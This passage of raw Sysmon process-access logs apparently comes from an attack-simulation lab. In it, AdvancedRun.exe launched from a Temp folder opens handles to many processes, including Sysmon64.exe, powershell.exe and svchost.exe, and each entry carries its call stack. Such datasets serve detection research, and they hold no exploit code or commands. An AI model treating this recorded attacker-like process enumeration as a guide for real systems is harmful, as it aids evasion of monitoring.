NI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080503Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.467{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080502Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.467{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080501Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.467{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080500Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.467{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080499Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.467{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004080498Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.466{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080497Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.466{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080496Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.466{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080495Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.466{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080494Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.466{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080493Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080492Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080491Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080490Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080489Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 